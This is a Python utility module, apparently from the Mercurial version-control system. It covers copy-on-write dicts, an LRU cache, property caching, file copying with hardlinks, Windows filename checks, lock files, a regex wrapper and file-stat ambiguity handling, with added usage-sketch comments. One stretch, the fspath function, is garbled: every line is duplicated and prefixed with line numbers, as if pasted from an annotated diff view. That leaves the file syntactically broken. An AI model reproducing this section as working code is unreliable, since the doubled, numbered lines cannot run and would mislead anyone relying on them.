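# A hedged usage sketch for cachefunc() (the wrapped function is
# illustrative): results are memoized forever, so it only suits pure
# functions with a bounded argument space.
#
#   @cachefunc
#   def _expensivestat(path):
#       return os.stat(path)
#
#   _expensivestat(b'/etc/hosts')   # computed once
#   _expensivestat(b'/etc/hosts')   # answered from the cache
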
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        if getattr(self, '_copied', 0):
            self._copied -= 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self

class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v

class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """

class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """

class transactional(object):
    """Base class for making a transactional type into a context manager."""
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            if exc_type is None:
                self.close()
        finally:
            self.release()

@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns.
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        tr.close()
        raise
    finally:
        tr.release()

@contextlib.contextmanager
def nullcontextmanager():
    yield

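# A hedged sketch of the transactional contract (the transaction object is
# hypothetical): used as a context manager, close() runs only when the body
# succeeds, and release() always runs, aborting anything left unclosed.
#
#   with sometransaction as tr:
#       dowrites(tr)       # an exception here skips close(); release()
#                          # then aborts the transaction
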
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (u'next', u'prev', u'key', u'value', u'cost')

    def __init__(self):
        self.next = None
        self.prev = None

        self.key = _notset
        self.value = None
        self.cost = 0

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
        self.value = None
        self.cost = 0

class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.

    Items in the cache can be inserted with an optional "cost" value. This is
    simply an integer that is specified by the caller. The cache can be queried
    for the total cost of all items presently in the cache.

    The cache can also define a maximum cost. If a cache insertion would
    cause the total cost of the cache to go beyond the maximum cost limit,
    nodes will be evicted to make room for the new item. This can be used
    to e.g. set a max memory limit and associate an estimated bytes size
    cost to each item in the cache. By default, no maximum cost is enforced.
    """
    def __init__(self, max, maxcost=0):
        self._cache = {}

        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self.capacity = max
        self.totalcost = 0
        self.maxcost = maxcost

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def insert(self, k, v, cost=0):
        """Insert a new item in the cache with optional cost value."""
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            self.totalcost -= node.cost
            node.value = v
            node.cost = cost
            self.totalcost += cost
            self._movetohead(node)

            if self.maxcost:
                self._enforcecostlimit()

            return

        if self._size < self.capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

            # At capacity. Kill the old entry.
            if node.key is not _notset:
                self.totalcost -= node.cost
                del self._cache[node.key]

        node.key = k
        node.value = v
        node.cost = cost
        self.totalcost += cost
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

        if self.maxcost:
            self._enforcecostlimit()

    def __setitem__(self, k, v):
        self.insert(k, v)

    def __delitem__(self, k):
        node = self._cache.pop(k)
        self.totalcost -= node.cost
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        try:
            return self.__getitem__(k)
        except KeyError:
            return default

    def clear(self):
        n = self._head
        while n.key is not _notset:
            self.totalcost -= n.cost
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self, capacity=None, maxcost=0):
        """Create a new cache as a copy of the current one.

        By default, the new cache has the same capacity as the existing one.
        But, the cache capacity can be changed as part of performing the
        copy.

        Items in the copy have an insertion/access order matching this
        instance.
        """

        capacity = capacity or self.capacity
        maxcost = maxcost or self.maxcost
        result = lrucachedict(capacity, maxcost=maxcost)

        # We copy entries by iterating in oldest-to-newest order so the copy
        # has the correct ordering.

        # Find the first non-empty entry.
        n = self._head.prev
        while n.key is _notset and n is not self._head:
            n = n.prev

        # We could potentially skip the first N items when decreasing capacity.
        # But let's keep it simple unless it is a performance problem.
        for i in range(len(self._cache)):
            result.insert(n.key, n.value, cost=n.cost)
            n = n.prev

        return result

    def popoldest(self):
        """Remove the oldest item from the cache.

        Returns the (key, value) describing the removed cache entry.
        """
        if not self._cache:
            return

        # Walk the linked list backwards starting at tail node until we hit
        # a non-empty node.
        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        key, value = n.key, n.value

        # And remove it from the cache and mark it as empty.
        del self._cache[n.key]
        self.totalcost -= n.cost
        n.markempty()

        return key, value

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node

    def _enforcecostlimit(self):
        # This should run after an insertion. It should only be called if total
        # cost limits are being enforced.
        # The most recently inserted node is never evicted.
        if len(self) <= 1 or self.totalcost <= self.maxcost:
            return

        # This is logically equivalent to calling popoldest() until we
        # free up enough cost. We don't do that since popoldest() needs
        # to walk the linked list and doing this in a loop would be
        # quadratic. So we find the first non-empty node and then
        # walk nodes until we free up enough capacity.
        #
        # If we only removed the minimum number of nodes to free enough
        # cost at insert time, chances are high that the next insert would
        # also require pruning. This would effectively constitute quadratic
        # behavior for insert-heavy workloads. To mitigate this, we set a
        # target cost that is a percentage of the max cost. This will tend
        # to free more nodes when the high water mark is reached, which
        # lowers the chances of needing to prune on the subsequent insert.
        targetcost = int(self.maxcost * 0.75)

        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        while len(self) > 1 and self.totalcost > targetcost:
            del self._cache[n.key]
            self.totalcost -= n.cost
            n.markempty()
            n = n.prev

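# A hedged usage sketch for lrucachedict (keys and costs are illustrative).
# Note that get() routes through __getitem__(), so a cache hit also
# refreshes the entry's recency:
#
#   d = lrucachedict(4, maxcost=100)
#   d.insert(b'a', b'v', cost=60)
#   d.insert(b'b', b'v', cost=60)   # totalcost 120 > 100, so b'a' is evicted
#   d[b'c'] = b'v'                  # plain __setitem__, cost defaults to 0
#   d.get(b'a')                     # -> None; a hit would move the key to head
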
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            else:
                order.remove(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            else:
                order.remove(args)
            order.append(args)
            return cache[args]

    return f

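# A hedged sketch contrasting lrucachefunc() with cachefunc() above (the
# wrapped function is illustrative): the cache holds roughly the 20 most
# recent results, evicting the least recently used key first.
#
#   compilepat = lrucachefunc(lambda pat: remod.compile(pat))
#   compilepat(br'a+')   # compiled and cached
#   compilepat(br'a+')   # cache hit; br'a+' becomes the freshest key
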
class propertycache(object):
    def __init__(self, func):
        self.func = func
        self.name = func.__name__
    def __get__(self, obj, type=None):
        result = self.func(obj)
        self.cachevalue(obj, result)
        return result

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value

def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    if prop in obj.__dict__:
        del obj.__dict__[prop]

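# propertycache is a non-data descriptor: the first access runs func and
# then shadows the descriptor through obj.__dict__, so later reads are plain
# attribute lookups. A hedged sketch (class and property are hypothetical):
#
#   class repoish(object):
#       @propertycache
#       def expensive(self):
#           return computeonce()      # runs once per instance
#
#   clearcachedproperty(r, 'expensive')   # force recomputation on next access
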
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        if not x:
            return 0
        i = 0
        while x:
            x >>= 1
            i += 1
        return i - 1

    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen >= min:
            if min < max:
                min = min << 1
                nmin = 1 << log2(blen)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield ''.join(buf)
            blen = 0
            buf = []
    if buf:
        yield ''.join(buf)

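# A hedged sketch of increasingchunks() (chunk sizes are illustrative):
# small input chunks are coalesced, and the minimum emitted size doubles
# toward max, which keeps write() calls from staying tiny while streaming.
#
#   pieces = (b'x' * 100 for _ in range(100))   # many 100-byte chunks
#   for buf in increasingchunks(pieces):
#       pass   # first buffer is >= 1024 bytes; later ones grow toward 65536
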
def always(fn):
    return True

def never(fn):
    return False

def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue has been fixed in 2.7. But it still affects
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        gcenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            if gcenabled:
                gc.enable()
    return wrapper

if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    nogc = lambda x: x

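# A hedged usage sketch for nogc() (the decorated function is hypothetical);
# note that on PyPy the decorator above is a no-op:
#
#   @nogc
#   def _buildhugemap(items):
#       return dict(items)   # GC stays disabled for the duration of the call
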
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'

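# A hedged example of pathto() on a POSIX layout (paths are illustrative):
#
#   pathto(b'/repo', b'src/lib', b'doc/README')
#
# strips the common prefix (none here), climbs out of n1 with one '..' per
# remaining component, then descends into n2: b'../../doc/README'.
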
# the location of data files matching the source code
if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)

def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                raise error.SignatureError
            raise

    return check

# a whitelist of known filesystems where hardlink works reliably
_hardlinkfswhitelist = {
    'apfs',
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'NTFS',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}

def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't needed
        # for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
                if oldstat and oldstat.stat:
                    newstat = filestat.frompath(dest)
                    if newstat.isambig(oldstat):
                        # stat of copied file is ambiguous to original one
                        advanced = (
                            oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                        os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise error.Abort(str(inst))

def copyfiles(src, dst, hardlink=None, progress=None):
    """Copy a directory tree using hardlinks if possible."""
    num = 0

    def settopic():
        if progress:
            progress.topic = _('linking') if hardlink else _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        settopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        settopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        if progress:
            progress.increment()

    return hardlink, num

_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                return _("filename contains '%s', which is invalid "
                         "on Windows") % stringutil.escapestr(c)
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t

if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

if safehasattr(time, "perf_counter"):
    timer = time.perf_counter

def makelock(info, pathname):
    """Create a lock file atomically if possible

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    ld = os.open(pathname, flags)
    os.write(ld, info)
    os.close(ld)

def readlock(pathname):
    try:
        return os.readlink(pathname)
    except OSError as why:
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    fp = posixfile(pathname, 'rb')
    r = fp.read()
    fp.close()
    return r

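# A hedged sketch of the lock round trip (path and contents are
# illustrative): makelock() prefers a symlink whose target carries the data,
# and readlock() falls back to reading a regular file where symlinks are
# unavailable.
#
#   makelock(b'myhost:12345', b'.hg/store/lock')
#   readlock(b'.hg/store/lock')   # -> b'myhost:12345'
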
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        return os.fstat(fp.fileno())
    except AttributeError:
        return os.stat(fp.name)

# File system features

def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    s1 = os.lstat(path)
    d, b = os.path.split(path)
    b2 = b.upper()
    if b == b2:
        b2 = b.lower()
        if b == b2:
            return True # no evidence against case sensitivity
    p2 = os.path.join(d, b2)
    try:
        s2 = os.lstat(p2)
        if s2 == s1:
            return False
        return True
    except OSError:
        return True

try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False

class _re(object):
    def _checkre2(self):
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape

re = _re()

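# A hedged usage sketch for the module-level ``re`` shim (the pattern is
# illustrative): callers use it like the stdlib module and transparently get
# re2 when it is importable and the flags are compatible.
#
#   pat = re.compile(br'[0-9a-f]{40}', remod.IGNORECASE)
#   pat.match(b'8f' * 20)   # the match API is the same either way
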
1938 _fspathcache = {}
1938 _fspathcache = {}
1939 def fspath(name, root):
1939 def fspath(name, root):
1940 '''Get name in the case stored in the filesystem
1940 '''Get name in the case stored in the filesystem
1941
1941
1942 The name should be relative to root, and be normcase-ed for efficiency.
1942 The name should be relative to root, and be normcase-ed for efficiency.
1943
1943
1944 Note that this function is unnecessary, and should not be
1944 Note that this function is unnecessary, and should not be
1945 called, for case-sensitive filesystems (simply because it's expensive).
1945 called, for case-sensitive filesystems (simply because it's expensive).
1946
1946
1947 The root should be normcase-ed, too.
1947 The root should be normcase-ed, too.
1948 '''
1948 '''
1949 def _makefspathcacheentry(dir):
1949 def _makefspathcacheentry(dir):
1950 return dict((normcase(n), n) for n in os.listdir(dir))
1950 return dict((normcase(n), n) for n in os.listdir(dir))
1951
1951
1952 seps = pycompat.ossep
1952 seps = pycompat.ossep
1953 if pycompat.osaltsep:
1953 if pycompat.osaltsep:
1954 seps = seps + pycompat.osaltsep
1954 seps = seps + pycompat.osaltsep
1955 # Protect backslashes. This gets silly very quickly.
1955 # Protect backslashes. This gets silly very quickly.
1956 seps.replace('\\','\\\\')
1956 seps.replace('\\','\\\\')
1957 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1957 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1958 dir = os.path.normpath(root)
1958 dir = os.path.normpath(root)
1959 result = []
1959 result = []
1960 for part, sep in pattern.findall(name):
1960 for part, sep in pattern.findall(name):
1961 if sep:
1961 if sep:
1962 result.append(sep)
1962 result.append(sep)
1963 continue
1963 continue
1964
1964
1965 if dir not in _fspathcache:
1965 if dir not in _fspathcache:
1966 _fspathcache[dir] = _makefspathcacheentry(dir)
1966 _fspathcache[dir] = _makefspathcacheentry(dir)
1967 contents = _fspathcache[dir]
1967 contents = _fspathcache[dir]
1968
1968
1969 found = contents.get(part)
1969 found = contents.get(part)
1970 if not found:
1970 if not found:
1971 # retry "once per directory" per "dirstate.walk" which
1971 # retry "once per directory" per "dirstate.walk" which
1972 # may take place for each patches of "hg qpush", for example
1972 # may take place for each patches of "hg qpush", for example
1973 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1973 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1974 found = contents.get(part)
1974 found = contents.get(part)
1975
1975
1976 result.append(found or part)
1976 result.append(found or part)
1977 dir = os.path.join(dir, part)
1977 dir = os.path.join(dir, part)
1978
1978
1979 return ''.join(result)
1979 return ''.join(result)
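
# Illustrative sketch (not part of the original module): on a
# case-insensitive filesystem whose directory listing stores 'README.txt',
# a normcase-ed query recovers the on-disk spelling; the repository root
# below is hypothetical.
#
#   fspath(b'readme.txt', b'/repo')  ->  'README.txt'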

def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass
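
# Illustrative sketch (an assumption, not from the original module): a
# caller can probe once per store directory and fall back to plain copies
# when hardlink counts are unreliable (e.g. on some Samba shares):
#
#   if not checknlink(os.path.join(storedir, b'probe')):
#       disable_hardlinks()      # hypothetical fallback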

def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    return (path.endswith(pycompat.ossep)
            or pycompat.osaltsep and path.endswith(pycompat.osaltsep))

def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative to a simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if needed.'''
    return path.split(pycompat.ossep)

def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents as name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp

class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid a preparative
    'exists()' examination on the client side of this class.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        stat = os.fstat(fp.fileno())
        return cls(stat)

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
                    self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
        except AttributeError:
            pass
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime  < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime  < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime  > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime  > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        same time in sec (= S[n-1].ctime), and comparison of timestamp
        is ambiguous.

        Base idea to avoid such ambiguity is "advance mtime 1 sec, if
        timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        a change hidden by a conflict between such mtimes.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if size of a file isn't changed.
        """
        try:
            return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        return not self == other
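
# A minimal usage sketch for filestat (not part of the original module);
# the path is hypothetical and the function is never called here.
def _filestatdemo(path=b'/tmp/example'):
    with open(path, 'wb') as fp:
        fp.write(b'old content')
    oldstat = filestat.frompath(path)
    with open(path, 'wb') as fp:
        fp.write(b'new content')
    newstat = filestat.frompath(path)
    if newstat.isambig(oldstat):
        # identical ctime: size/mtime checks alone could miss the rewrite,
        # so nudge mtime one second past the old value
        newstat.avoidambig(path, oldstat)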

class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

